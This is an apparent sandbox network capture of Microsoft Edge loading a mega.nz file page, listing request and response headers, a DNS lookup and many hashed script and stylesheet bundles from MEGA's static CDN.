GET /sw.js?v=1 HTTP/1.1
Host: mega.nz
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Service-Worker: script
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: same-origin
Sec-Fetch-Dest: serviceworker
Referer: https://mega.nz/file/ozNUBJZL
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 1208
Cache-Control: max-age=8640000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Content-Encoding: gzip
GET

https://mega.nz/decrypter.js

msedge.exe

Remote address:

31.216.145.5:443

Request

GET /decrypter.js HTTP/1.1
Host: mega.nz
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: same-origin
Sec-Fetch-Dest: worker
Referer: https://mega.nz/file/ozNUBJZL
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 817
Cache-Control: max-age=8640000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Content-Encoding: gzip
GET

https://mega.nz/aesasm.js

msedge.exe

Remote address:

31.216.145.5:443

Request

GET /aesasm.js HTTP/1.1
Host: mega.nz
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://mega.nz/decrypter.js
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 17915
Cache-Control: max-age=8640000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Content-Encoding: gzip
GET

https://mega.nz/manifest.json

msedge.exe

Remote address:

31.216.145.5:443

Request

GET /manifest.json HTTP/1.1
Host: mega.nz
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: manifest
Referer: https://mega.nz/file/ozNUBJZL
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: application/json
Content-Length: 275
Cache-Control: max-age=8640000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Content-Encoding: gzip
DNS

eu.static.mega.co.nz

msedge.exe

Remote address:

8.8.8.8:53

Request

eu.static.mega.co.nz

IN A

Response

eu.static.mega.co.nz

IN A

66.203.127.11

eu.static.mega.co.nz

IN A

66.203.127.13

eu.static.mega.co.nz

IN A

89.44.169.134

eu.static.mega.co.nz

IN A

66.203.124.37
GET

https://eu.static.mega.co.nz/4/lang/en_11f7cca2eeb2905dc77b9db513d6a198d969680f9bf3d3d1fa87f1f226b82818.json

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/lang/en_11f7cca2eeb2905dc77b9db513d6a198d969680f9bf3d3d1fa87f1f226b82818.json HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: application/json
content-length: 100360
last-modified: Thu, 19 Dec 2024 03:31:22 GMT
vary: Accept-Encoding
etag: "6763938a-18808"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-1_84fe11c3c1917aecac92a2dbbe7792e9f6996f187125dd122ecd6cfe18019726.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-1_84fe11c3c1917aecac92a2dbbe7792e9f6996f187125dd122ecd6cfe18019726.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: application/javascript
content-length: 115648
last-modified: Thu, 19 Dec 2024 03:31:26 GMT
vary: Accept-Encoding
etag: "6763938e-1c3c0"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-2_eea10faf2aaaa936c46e5138f7ed5ca0bbab294163d18b4b739f63e7083975f7.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-2_eea10faf2aaaa936c46e5138f7ed5ca0bbab294163d18b4b739f63e7083975f7.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: application/javascript
content-length: 107382
last-modified: Thu, 19 Dec 2024 03:31:29 GMT
vary: Accept-Encoding
etag: "67639391-1a376"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-3_42751776233fcb9a480f5ab8ebae727f6392c914e4b8a535bdef5125e78113b3.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-3_42751776233fcb9a480f5ab8ebae727f6392c914e4b8a535bdef5125e78113b3.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: application/javascript
content-length: 84663
last-modified: Thu, 19 Dec 2024 03:31:27 GMT
vary: Accept-Encoding
etag: "6763938f-14ab7"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-4_1a3426ce2ce9d9275449a26008c6692de93968c603189fd38bc81f0a5babd6ca.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-4_1a3426ce2ce9d9275449a26008c6692de93968c603189fd38bc81f0a5babd6ca.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: application/javascript
content-length: 86499
last-modified: Thu, 19 Dec 2024 03:31:29 GMT
vary: Accept-Encoding
etag: "67639391-151e3"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-5_4cb5522e1082f1ba951ba7938584ee9371d5d976686ad3db69cd47ef04a6ff8d.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-5_4cb5522e1082f1ba951ba7938584ee9371d5d976686ad3db69cd47ef04a6ff8d.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: application/javascript
content-length: 116269
last-modified: Thu, 19 Dec 2024 03:31:27 GMT
vary: Accept-Encoding
etag: "6763938f-1c62d"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-6_3ef80c9b730a18ab36875080d7dad08d17a9f64c6ae86bb3347728dfcc6ca7f0.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-6_3ef80c9b730a18ab36875080d7dad08d17a9f64c6ae86bb3347728dfcc6ca7f0.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: application/javascript
content-length: 108542
last-modified: Thu, 19 Dec 2024 03:31:26 GMT
vary: Accept-Encoding
etag: "6763938e-1a7fe"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-7_eb91e2702f3cab053d6dd5fb240d8eb4bc568cbadc7cc8d389d94ca2bf411e0a.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-7_eb91e2702f3cab053d6dd5fb240d8eb4bc568cbadc7cc8d389d94ca2bf411e0a.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: application/javascript
content-length: 114704
last-modified: Thu, 19 Dec 2024 03:31:26 GMT
vary: Accept-Encoding
etag: "6763938e-1c010"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/css/mega-1_92dafd33b7f185ab9cf118f645668dc83a072936a1eae5a5e146ac2cffce3bc3.css

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/css/mega-1_92dafd33b7f185ab9cf118f645668dc83a072936a1eae5a5e146ac2cffce3bc3.css HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: text/css
content-length: 79740
last-modified: Thu, 19 Dec 2024 03:31:29 GMT
vary: Accept-Encoding
etag: "67639391-1377c"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/html/templates_c89ae1c612ddc3e756d1a2d48b509e691a13ebb02391239e2ffb1e52c94f0f49.json

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/html/templates_c89ae1c612ddc3e756d1a2d48b509e691a13ebb02391239e2ffb1e52c94f0f49.json HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: application/json
content-length: 110278
last-modified: Thu, 19 Dec 2024 03:31:29 GMT
vary: Accept-Encoding
etag: "67639391-1aec6"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-8_e6c50968bfa5e71ce6c840594b820d67c44e382b4e304640204859c097b24a26.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-8_e6c50968bfa5e71ce6c840594b820d67c44e382b4e304640204859c097b24a26.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: application/javascript
content-length: 20510
last-modified: Thu, 19 Dec 2024 03:31:26 GMT
vary: Accept-Encoding
etag: "6763938e-501e"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-9_01a59da23c0750e38ea764d4daf9d6f282d62c73b3495ab1d93f13b844ef79a6.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-9_01a59da23c0750e38ea764d4daf9d6f282d62c73b3495ab1d93f13b844ef79a6.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: application/javascript
content-length: 90064
last-modified: Thu, 19 Dec 2024 03:31:26 GMT
vary: Accept-Encoding
etag: "6763938e-15fd0"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/css/bottom-pages-animations.css-postbuild_077437ba5398f2997efea39e55f89eadd473667177aba0b14a48c8b57c60af43.css

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/css/bottom-pages-animations.css-postbuild_077437ba5398f2997efea39e55f89eadd473667177aba0b14a48c8b57c60af43.css HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:37 GMT
content-type: text/css
content-length: 1377
last-modified: Thu, 19 Dec 2024 03:31:29 GMT
vary: Accept-Encoding
etag: "67639391-561"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-10_be42da38e225d60bb30921c61a1ac19ec04e63dbc0dd1829fb5c0a2f4e2f7552.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-10_be42da38e225d60bb30921c61a1ac19ec04e63dbc0dd1829fb5c0a2f4e2f7552.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: application/javascript
content-length: 118941
last-modified: Thu, 19 Dec 2024 03:31:26 GMT
vary: Accept-Encoding
etag: "6763938e-1d09d"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/css/mega-2_39c0da4074eb66e58bbdcc6eaaef1ae9931add05ca46b09d4d2f36a3fe621575.css

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/css/mega-2_39c0da4074eb66e58bbdcc6eaaef1ae9931add05ca46b09d4d2f36a3fe621575.css HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: text/css
content-length: 30713
last-modified: Thu, 19 Dec 2024 03:31:29 GMT
vary: Accept-Encoding
etag: "67639391-77f9"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-11_0c1df06f65bb9622fb152174fa4f2df6dbfbf31b0adc5f5822e3b01aba3ed294.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-11_0c1df06f65bb9622fb152174fa4f2df6dbfbf31b0adc5f5822e3b01aba3ed294.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: application/javascript
content-length: 107285
last-modified: Thu, 19 Dec 2024 03:31:26 GMT
vary: Accept-Encoding
etag: "6763938e-1a315"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-12_8c600360713c203c7887aee2a1d38048b05cb34f6923bcfba3040fc3457ada2a.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-12_8c600360713c203c7887aee2a1d38048b05cb34f6923bcfba3040fc3457ada2a.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: application/javascript
content-length: 96130
last-modified: Thu, 19 Dec 2024 03:31:27 GMT
vary: Accept-Encoding
etag: "6763938f-17782"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-13_4eeaeec393a7dff805017453b32b8a31b3d331d019ad10bfe7716b610f74a8ee.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-13_4eeaeec393a7dff805017453b32b8a31b3d331d019ad10bfe7716b610f74a8ee.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: application/javascript
content-length: 11929
last-modified: Thu, 19 Dec 2024 03:31:27 GMT
vary: Accept-Encoding
etag: "6763938f-2e99"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/css/mega-3_d9ebf5a3a9f20dca5eb7ef37e5aedc92373d364931527c845afc9264614abb78.css

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/css/mega-3_d9ebf5a3a9f20dca5eb7ef37e5aedc92373d364931527c845afc9264614abb78.css HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: text/css
content-length: 118469
last-modified: Thu, 19 Dec 2024 03:31:29 GMT
vary: Accept-Encoding
etag: "67639391-1cec5"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-14_0cdb3938fad1fff0fa8762fd66decaa1650272cb5f9e11dd4b7c775a0f0e4441.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-14_0cdb3938fad1fff0fa8762fd66decaa1650272cb5f9e11dd4b7c775a0f0e4441.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: application/javascript
content-length: 104618
last-modified: Thu, 19 Dec 2024 03:31:27 GMT
vary: Accept-Encoding
etag: "6763938f-198aa"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-15_21564bc837564867637255a20bb45823e8d7271f6310afb06627c55e35ccdbe5.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-15_21564bc837564867637255a20bb45823e8d7271f6310afb06627c55e35ccdbe5.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: application/javascript
content-length: 103121
last-modified: Thu, 19 Dec 2024 03:31:26 GMT
vary: Accept-Encoding
etag: "6763938e-192d1"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

